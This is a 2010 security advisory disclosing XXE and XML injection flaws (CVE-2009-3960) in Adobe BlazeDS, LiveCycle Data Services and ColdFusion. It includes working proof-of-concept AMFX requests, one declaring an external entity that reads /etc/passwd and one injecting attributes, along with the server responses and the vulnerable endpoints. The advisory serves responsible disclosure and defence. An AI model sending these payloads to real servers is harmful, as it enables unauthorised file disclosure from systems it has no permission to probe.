Adobe Products XML External Entity And XML Injection

`  
( , ) (,  
. `.' ) ('. ',  
). , ('. ( ) (  
(_,) .`), ) _ _,  
/ _____/ / _ \ ____ ____ _____   
\____ \==/ /_\ \ _/ ___\/ _ \ / \   
/ \/ | \\ \__( <_> ) Y Y \  
/______ /\___|__ / \___ >____/|__|_| /  
\/ \/.-. \/ \/:wq   
(x.0)  
'=.|w|.='  
_='`"``=.  
  
presents..  
  
Multiple Adobe Products  
XML External Entity And XML Injection Vulnerabilities  
  
CVE: CVE-2009-3960  
Adobe PSIRT: APSB10-05 - http://www.adobe.com/support/security/bulletins/apsb10-05.html  
Link: http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf  
  
+-----------+  
|Description|  
+-----------+  
  
Security-Assessment.com discovered that multiple Adobe   
products with different Data Services versions are   
vulnerable to XML External Entity (XXE) and XML   
injection attacks.   
XML external Entities injection allows a wide range of  
XML based attacks, including local file disclosure,   
TCP scans and Denial of Service condition, which can   
be achieved by recursive entity injection, attribute   
blow up and other types of injection.   
For more information about the implications associated  
to this vulnerability, refer to the RFC2518 (17.7   
Implications of XML External Entities):   
http://www.ietf.org/rfc/rfc2518.txt  
  
+--------------+  
|Product Review|  
+--------------+  
  
Adobe Data Services components provide Flex/RIA   
applications with data messaging, remoting and   
management capabilities.  
  
The discovered vulnerabilities affect the HTTPChannel  
servlet classes which are respectively   
“mx.messaging.channels.HTTPChannel” and   
“mx.messaging.channels.SecureHTTPChannel”. These   
classes are part of the Data Services Messaging   
classes and can be found in the   
flex-messaging-common.jar Java archive.  
  
The HTTPChannel transports data in the AMFX format,   
which is the text-based XML representation of AMF.   
The HTTPChannel endpoints are defined in the   
services-config.xml file, located within the   
Flex/WEB-INF folder of the application.   
By default, the HTTPChannel classes are mapped to   
the following endpoints:  
  
1. http://{server.name}:{server.port}/{context.root}/messagebroker/http  
2. https://{server.name}:{server.port}/{context.root}/messagebroker/httpsecure  
  
Note that the HTTPChannel may be mapped to different   
endpoints.   
This depends on the deployed application and the   
framework in use (e.g. BlazeDS, Adobe LiveCycle   
Data Services, etc.).  
  
+--------------------------------------------+  
|Exploitation - XML External Entity Injection|  
+--------------------------------------------+  
  
XML entities can be declared and included within AMFX  
requests passed to the HTTPChannel. The XML parser   
parses the payload and successfully processes   
injected entities.  
  
The following table shows an example of XML external  
entity injection which leads to local file disclosure.  
The AMFX request is sent via the HTTPChannel endpoint  
in BlazeDS.  
  
XML External Entity Injection – Local File Disclosure  
PoC – BlazeDS – Request  
  
POST /samples/messagebroker/http HTTP/1.1  
Content-type: application/x-amf  
  
<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE test [ <!ENTITY x3 SYSTEM "/etc/passwd"> ]>  
<amfx ver="3" xmlns="http://www.macromedia.com/2005/amfx">  
<body>  
<object type="flex.messaging.messages.CommandMessage">  
<traits>  
<string>body</string><string>clientId</string><string>correlationId</string>  
<string>destination</string><string>headers</string><string>messageId</string>  
<string>operation</string><string>timestamp</string><string>timeToLive</string>  
</traits><object><traits />  
</object>  
<null /><string /><string />  
<object>  
<traits>  
<string>DSId</string><string>DSMessagingVersion</string>  
</traits>  
<string>nil</string><int>1</int>  
</object>  
<string>&x3;</string>  
<int>5</int><int>0</int><int>0</int>  
</object>  
</body>  
</amfx>  
  
  
XML External Entity Injection – Local File Inclusion  
PoC – BlazeDS – Response  
  
<?xml version="1.0" encoding="utf-8"?>  
<amfx ver="3"><header name="AppendToGatewayUrl" mustUnderstand="true">  
<string>;jsessionid=2191D3647221B72039C5B05D38084A42</string></header>  
<body targetURI="/onResult" responseURI="">  
<object type="flex.messaging.messages.AcknowledgeMessage">  
<traits><string>timestamp</string><string>headers</string>  
<string>body</string><string>correlationId</string>  
<string>messageId</string><string>timeToLive</string>  
<string>clientId</string><string>destination</string>  
</traits><double>1.257387140632E12</double><object>  
<traits><string>DSMessagingVersion</string>  
<string>DSId</string></traits><double>1.0</double>  
<string>BDE929FE-270D-3B56-1061-616E8B938429</string>  
</object><null/><string>root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
[...]  
  
  
The above injection was successfully tested on   
multiple Adobe products, as shown below:  
  
1. Product: Adobe BlazeDS 3.2.0.39  
Linux Ubuntu 9.04 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
  
2. Adobe LiveCycle Data Services ES2 3.0  
Windows XP SP2 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
3. ColdFusion 9.0  
Windows XP SP2 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/flex2gateway/http  
{server.name}:{server.port}/  
{context.root}/flex2gateway/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
4. Adobe LiveCycle ES2  
Windows XP SP2 / IBM Websphere 7.0  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
The vendor has released several patches for this   
vulnerability. See the Solution section of this   
document for more information.  
  
+----------------------------+  
|Exploitation - XML Injection|  
+----------------------------+  
  
The XML parser lacks of proper input and output   
validation controls. Security-Assessment.com managed  
to inject arbitrary XML content which was returned  
in the XML response.   
The following table shows an XML injection in the   
BlazeDS HTTPChannel. The injected payload becomes   
part of the response. In this case, injection is   
possible via the “responseURI” attribute.  
  
XMLInjection – BlazeDS - Request  
  
POST /samples/messagebroker/http HTTP/1.1  
Content-type: application/x-amf  
  
<?xml version="1.0" encoding="utf-8"?>  
<amfx ver="3"><body targetURI="" responseURI="d" injectedattr="anything"><null/>  
</body></amfx>  
  
XMLInjection – BlazeDS - Response  
  
<?xml version="1.0" encoding="utf-8"?>  
<amfx ver="3"><body targetURI="d" injectedattr="anything" responseURI=""><null/></body></amfx></body></amfx>  
  
The above injection was successfully tested on   
multiple Adobe products, as shown below:  
  
1. Product: Adobe BlazeDS 3.2.0.39  
Linux Ubuntu 9.04 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
  
2. Adobe LiveCycle Data Services ES2 3.0  
Windows XP SP2 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
3. ColdFusion 9.0  
Windows XP SP2 / Tomcat 6.0.14  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/flex2gateway/http  
{server.name}:{server.port}/  
{context.root}/flex2gateway/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
4. Adobe LiveCycle ES2  
Windows XP SP2 / IBM Websphere 7.0  
  
Endpoint URIs:  
  
{server.name}:{server.port}/  
{context.root}/messagebroker/http  
{server.name}:{server.port}/  
{context.root}/messagebroker/httpsecure   
  
Methods: POST, GET  
Protocols: HTTP, HTTPS  
  
  
The vendor has released several patches for this   
vulnerability. See the Solution section of this   
document for more information.  
  
  
+--------+  
|Solution|  
+--------+  
  
Security-Assessment.com follows responsible  
disclosure and promptly contacted the vendor after   
discovering the issues. The vendor was contacted on   
the 6th November 2009 and a reply was received on the  
same day. The vendor released security patches on   
the 11th February 2010.  
  
The security patches can be downloaded at the   
following website:   
  
http://www.adobe.com/support/security/bulletins/apsb10-05.html  
  
  
+------+  
|Credit|  
+------+  
  
Discovered and advised to Adobe in  
November 2009 by Roberto Suggi Liverani of Security-  
Assessment.com. Personal Page: http://malerisch.net/  
  
For full details regarding this vulnerability  
download the PDF from our website:  
  
http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf  
  
  
+---------+  
|Greetings|  
+---------+  
  
Bug found at Hack in The Sun 2009, Waiheke Island.  
  
  
+-----------------------------+  
|About Security-Assessment.com|  
+-----------------------------+  
  
Security-Assessment.com is a New Zealand based world  
leader in web application testing, network security  
and penetration testing. Security-Assessment.com  
services organisations across New Zealand, Australia,  
Asia Pacific, the United States and the United  
Kingdom.  
  
Roberto Suggi Liverani  
  
`